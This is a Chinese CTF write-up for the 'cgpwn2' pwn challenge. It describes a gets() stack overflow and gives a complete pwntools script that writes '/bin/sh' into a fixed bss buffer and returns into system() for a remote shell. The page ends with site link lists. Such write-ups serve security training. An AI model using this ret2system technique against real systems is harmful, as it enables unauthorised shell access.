pwn之cgpwn2 - 代码天地

pwn之cgpwn2

其他 2020-01-14 10:24:03 阅读次数: 0

0x01寻找漏洞

checksec

在这里插入图片描述

ida分析

在这里插入图片描述
进入hello（）函数

get()函数存在栈溢出

name在bss段中，地址固定不变
可以利用fgets函数向其中写东西
程序中调用了system函数，但是没有/bin/sh

0x02分析利用

通过栈溢出漏洞，调用system函数，同时在name中写入“/bin/sh”，把参数地址设置为name的首地址，就可以getshell了

0x03攻击

#!usr/bin/python
from pwn import *

io = remote("111.198.29.45",37884)
# io = process("./cgpwn2")

context.log_level = 'debug'

sys_addr = 0x08048420

io.recvuntil("your name")
io.sendline("/bin/sh")

bin_sh_addr = 0x0804A080

io.recvuntil("leave some message here:")
payload  = "a" * 0x26 + "aaaa" + p32(sys_addr) + "aaaa" + p32(bin_sh_addr)


io.sendline(payload)

io.interactive()

黑羽之沧澜落月

发布了17 篇原创文章 · 获赞 1 · 访问量 470

私信关注

猜你喜欢

转载自blog.csdn.net/qq_43430261/article/details/102684035

攻防世界_pwn_cgpwn2(萌新版)

pwn之cgpwn2

攻防世界—pwn—cgpwn2

cgpwn2的wp

小白写 PWN新手训练区 Writeup第九题：cgpwn2

2. pwn入门新手做system没有参数（内含函数调用过程），需要自己构造的攻防世界cgpwn2，求大佬指教

cgpwn2---writeup

day-10 xctf-cgpwn2

pwn-pwn2

pwn之ret2libc

pwn学习之ret2libc

xctf pwn高手进阶题之stack2

kernel-pwn之ret2dir利用技巧

pwn-ROP(2)

pwn的学习2 coliision

bugke pwn2

pwn stack2

ctf pwn基础-2

pwn学习之四

Pwn之CGfab的WirteUp

[WP]BugkuCtf - pwn2

BugkuCtf-pwn2-exp

NSCTF 2017-pwn2

buuctf --pwn part2

pwn2_sctf_2016

一步一步pwn路由器之radare2使用实战

每日3道PWN之课外2道（第2.5天）2.0版

PWN学习之house of系列

xctf-pwn 之string

Pwn之ROP系列练习

今日推荐

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

周排行

浏览器对同一域名进行请求的最大并发连接数

React Hook之自定义Hook

【转】MyBatis缓存机制

-Java-泛型

自动化测试常用脚本-发送邮件

LeetCode#859: Buddy Strings

java、Python处理字符串

第二篇の博客

Hadoop伪分布式环境安装

SQL Server进阶（十一）临时表、表变量

每日归档

更多

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)